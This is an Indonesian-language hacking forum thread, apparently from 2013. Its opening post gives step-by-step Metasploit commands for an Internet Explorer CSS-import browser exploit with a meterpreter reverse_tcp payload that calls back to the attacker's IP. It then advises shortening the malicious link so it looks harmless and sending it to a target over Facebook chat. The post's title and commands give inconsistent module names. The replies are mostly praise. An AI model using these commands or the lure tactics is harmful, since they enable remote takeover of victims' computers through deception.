exploit ms11_033_ie_css_import
#1
ini sih sebenernya akal akalan nya si bleki orion , tapi ilmu emang buat dishare kok :d

langsung aja tutorial nya , maap berantakan
exploit ini memanfaatkan kelemahan browser IE om , windows 7 bisa lah , tergantung kitanya sang attacker =))

pertama jelas buka termanal dong

1. buka msfconsole ,, terserah sih mau pake armitage ato msfgui , lanjut masukkan command command nya bro.

msf > use exploit/windows/browser/ms11_003_ie_css_import

[Image: 0o6izaax7dbyk346g.jpg?size_id=5]

2. lalu set payload nya , disini ane pake meterpreter/reverse_tcp

msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp

[Image: q7vl0hf3rfwls5z6g.jpg]

3. set ip LHOST nya , LHOST disini adalah ip ATTACKER dilanjutkan set URIPATH nya

msf exploit(ms11_003_ie_css_import) > set LHOST 192.168.151.14

msf exploit(ms11_003_ie_css_import) > set URIPATH /

[Image: bg8c59ptz3eqtcd6g.jpg]

4. nah , yang ini terserah , untuk SRVPORT nya bisa make port yang belum kepakai , misal ane pakai port 8080 yang nanti akan ane convert link nya supaya gak ketahuan , kan aneh kalo ngasih link ada port 8080 nya.

Sebenernya bisa lebih mudah pakai port 80 , jadi kita tinggal arah kan TARGET ke ip kita makek ettercap dengan plugins dns_spoof. Tapi berhubung pas bikin nih tutor ane lagi chatting dipesbuk ya maka kepakailah port 80 tersebut.

Paham bro ? kalo nggak paham ya berarti sama , ane juga gak paham =))

msf exploit(ms11_003_ie_css_import) > set SRVPORT 8080

[Image: tutt.png]

5. Lanjut kita exploit

[Image: uqb6ho1b09e1c9x6g.jpg]

6. nah , http://192.168.151.14:8080
intinya bagaimana pun cara nya kita harus bisa mancing target buat buka tuh ip dengan port 8080 dll dengan browser internet explorer.

7. Disini ane pake teknik soceng sedikit , kita convert tuh link pake pendek.in

[Image: 11hv2156l4gjj176g.jpg]

8. Oke , setelah dipendekin , link nya berubah , jadi gak mencurigakan , selanjut nya kasih ke target bisa melalui apa kek , chat pesbuk misal nya , pikir sendiri yah.

[Image: e3nvkbk381qt3ih6g.jpg]

9. saat target membuka link tersebut dengan browser IE akan terlihat seperti SS berikut.

[Image: 9tvogrx2jlmdjht6g.jpg]

10. Nah...seperti Ss diatas , terlihat kata "meterpreter session 1 opened"

[Image: u6cwxdowlyyjdx96g.jpg]

coba di enter trus kita interaksi dengan meterpreter id 1

[Image: z4c4dvui4tni4cl6g.jpg]

nah , masuk sesi meterpreter , mari kita lihat info O.S nya

[Image: ctlwtozbxs468yl6g.jpg]

ckck windows 7 pwned :-?

ok, sekian tutorial dari saya , saya larcenciels ganteng mohon undur diri , sekian dan terimagaji =))

#2
keren om keren makasih inponya ijin disedot ilmunya Big Grin

#3
(04-26-2013, 04:03 PM)orochimadit Wrote: keren om keren makasih inponya ijin disedot ilmunya Big Grin

silahkan om Big Grin

(04-26-2013, 04:03 PM)orochimadit Wrote: keren om keren makasih inponya ijin disedot ilmunya Big Grin

silahkan om

(04-26-2013, 04:03 PM)orochimadit Wrote: keren om keren makasih inponya ijin disedot ilmunya Big Grin

silahkan om

#4
wah keren tuh sob ...
klo di ganti pke ip publik bisa ga tuh ????

#5
keren2 nice tutor om nulbe Big Grin
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#6
keren om.. tapi mesti pake IE yah? kan udah jarang orang indo pake IE..
Security awareness should be the continuing practice of a skill and not the continuous reminder of a threat.

#7
nice wak, lanjuik taruih buek tutor e





Users browsing this thread: 1 Guest(s)